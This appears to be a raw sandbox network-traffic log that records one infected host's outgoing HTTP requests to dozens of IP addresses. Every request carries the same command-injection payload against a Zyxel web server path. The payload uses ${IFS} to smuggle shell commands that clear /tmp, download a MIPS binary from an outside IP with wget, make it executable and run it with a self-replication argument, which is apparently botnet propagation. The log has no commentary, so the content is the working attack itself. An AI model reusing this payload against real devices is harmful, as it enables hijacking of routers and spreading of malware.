                                        Jan 14, 2024 16:19:02.884433031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9422192.168.2.1339250194.233.34.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884509087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9423192.168.2.135794045.181.24.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884531975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9424192.168.2.1354228157.94.254.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884573936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9425192.168.2.1346978170.244.178.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884572983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9426192.168.2.1335846205.122.150.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884637117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9427192.168.2.134185623.64.58.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884673119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9428192.168.2.134665841.6.49.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884701967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9429192.168.2.134854099.20.154.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884762049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9430192.168.2.1359440149.15.162.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884815931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9431192.168.2.133900447.203.44.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884834051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9432192.168.2.135632282.198.236.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884880066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9433192.168.2.1345990124.159.76.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884919882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9434192.168.2.1358900166.150.228.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884973049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9435192.168.2.135486241.130.37.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.884999037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9436192.168.2.1353930189.5.70.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885030031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9437192.168.2.134065441.125.218.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885056019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9438192.168.2.1358814192.11.75.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885108948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9439192.168.2.135193095.35.150.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885118961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9440192.168.2.1354246201.247.7.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885157108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9441192.168.2.1355676211.172.193.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885196924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9442192.168.2.1351272222.198.181.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885238886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9443192.168.2.136025848.223.150.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885271072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9444192.168.2.135329812.46.33.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885301113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9445192.168.2.1342454119.172.158.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885351896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9446192.168.2.1336692160.177.94.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885385036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9447192.168.2.133870045.83.240.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885427952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9448192.168.2.1336032143.214.229.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885432959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9449192.168.2.134841868.147.15.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.885452986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9450192.168.2.134414645.243.24.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.888961077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9451192.168.2.1347780112.148.4.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.888988972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9452192.168.2.133524461.91.54.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902204990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9453192.168.2.1360838149.49.60.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902321100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9454192.168.2.1359010126.96.56.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902390957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9455192.168.2.1345214209.59.71.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902453899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9456192.168.2.134468292.30.226.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902509928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9457192.168.2.1347656153.255.121.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902595997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9458192.168.2.1358482144.157.98.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902637959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9459192.168.2.135862214.159.0.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902697086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9460192.168.2.1348652150.81.246.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902774096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9461192.168.2.135011474.51.161.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902853966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9462192.168.2.1339542105.154.165.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902915001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9463192.168.2.135713636.244.231.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.902978897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9464192.168.2.134459251.146.213.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903028011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9465192.168.2.13456821.17.220.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903059959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9466192.168.2.133546660.90.37.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903145075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9467192.168.2.1359172223.47.90.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903213978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9468192.168.2.1357286221.148.12.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903268099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9469192.168.2.133537487.218.160.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903316021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9470192.168.2.1351410122.100.138.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903383970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9471192.168.2.1351414150.104.244.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903429985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9472192.168.2.1334772184.149.158.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903506994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9473192.168.2.1359626161.179.101.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903544903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9474192.168.2.1349866128.64.135.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903641939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9475192.168.2.1356528171.165.135.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903698921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9476192.168.2.1345726182.188.213.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903773069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9477192.168.2.1357174119.122.160.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903840065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9478192.168.2.1333912169.197.125.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903939962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9479192.168.2.134104067.42.92.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.903990984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9480192.168.2.1334226212.124.209.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904083967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9481192.168.2.1340406190.8.173.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904124022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9482192.168.2.134770690.7.78.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904176950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9483192.168.2.1353602210.51.12.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:03.904248953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9484192.168.2.135402240.72.44.80443
                                        TimestampBytes transferredDirectionData
